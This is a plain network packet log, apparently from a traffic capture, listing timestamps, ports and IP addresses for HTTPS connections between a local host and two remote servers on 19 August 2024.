Aug 19, 2024 09:28:42.352554083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352674007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352694035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352742910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352749109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352787971 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.352982998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.352998972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.353049994 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.353063107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.353072882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.353094101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.353104115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.353110075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.353138924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.353167057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.354341984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.354357958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.354424953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.354434967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.354444027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.354492903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.354752064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.391865015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.391891003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.391946077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.391949892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.391971111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.392009974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.392057896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.443769932 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.443793058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.443943977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.443981886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444021940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444025993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444036961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444056988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444073915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444082975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444104910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444123983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444288969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444307089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444492102 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444500923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444542885 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444761038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444778919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444823027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444830894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444852114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444874048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.444972992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.444988012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.445044994 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.445051908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.445086956 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.445358038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.445372105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.445414066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.445421934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.445453882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.446443081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.486892939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.486926079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.486965895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.487025023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.487065077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.487086058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.487144947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.536540031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536582947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536645889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536694050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536715984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.536742926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536787987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.536839962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536859035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536900043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.536907911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.536933899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.537287951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.537312031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.537344933 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.537357092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.537374973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.537558079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.537575006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.537616014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.537622929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.537646055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.538729906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.538755894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.538791895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.538808107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.538820028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.539300919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.579118013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.579142094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.579319954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.579343081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.579360008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.579380035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.579492092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.579499960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.622419119 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.628988028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629017115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629160881 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629178047 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629190922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629216909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629276991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629283905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629326105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629451990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629467010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629525900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629533052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629581928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629699945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629715919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629781008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629789114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.629829884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.629996061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.630012989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.630070925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.630078077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.630145073 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.631460905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.631481886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.631540060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.631547928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.631596088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.634622097 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.671839952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.671864033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.671991110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.672009945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.672023058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.672043085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.672046900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.672058105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.672074080 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.672111988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.721586943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.721616983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.721760988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.721782923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.721827030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.721843958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.721862078 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.721890926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.721898079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.721915007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.721932888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.722121954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722138882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722181082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.722187042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722245932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.722429991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722450018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722521067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.722527981 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722603083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.722703934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722721100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722795963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.722801924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.722887993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.731985092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.732007027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.732105970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.732115984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.732196093 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.764636993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.764663935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.764724016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.764767885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.764878988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.764897108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.765037060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.814528942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.814553976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.814606905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.814626932 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.814646006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.814663887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.814862013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.814879894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.814913988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.814923048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.814946890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.814970016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.815522909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.815537930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.815594912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.815604925 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.815618038 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.815638065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.816122055 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.816140890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.816201925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.816210032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.816243887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.816453934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.816471100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.816505909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.816514015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.816534042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.816550970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.824811935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.824834108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.824883938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.824899912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.824924946 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.824949026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.857115984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.857141018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.857182026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.857198954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.857219934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.857234955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.857300997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.857321978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.857350111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.857357025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.857381105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.857395887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.907108068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.907133102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.907272100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.907272100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.907299042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.907345057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.907516003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.907533884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.907579899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.907591105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.907656908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.908345938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.908370972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.908416033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.908427954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.908492088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.908509016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.908821106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.908838034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.908879995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.908889055 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.908979893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.909101963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.909120083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.909219027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.909228086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.909286976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.909817934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.918906927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.918930054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.918996096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.919014931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.919054031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.949820995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.949846029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.949886084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.949904919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.949918032 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.949942112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.950436115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.950457096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.950495958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.950506926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.950527906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.950546026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.999706984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.999737978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.999779940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.999800920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:42.999816895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:42.999850035 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.000085115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.000103951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.000130892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.000139952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.000159979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.000180006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.000674009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.000691891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.000724077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.000734091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.000754118 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.000770092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.001504898 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.001538038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.001566887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.001578093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.001599073 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.001612902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.001782894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.001799107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.001832008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.001840115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.001859903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.001877069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.002188921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.011369944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.011396885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.011439085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.011452913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.011470079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.011486053 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.042673111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.042701960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.042745113 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.042763948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.042778969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.042799950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.042821884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.042840958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.042881966 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.042891026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.042923927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.061883926 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.061932087 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:43.062006950 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.063004017 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.063021898 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:43.092336893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.092360020 CEST	443	49759	185.149.100.242	192.168.2.4
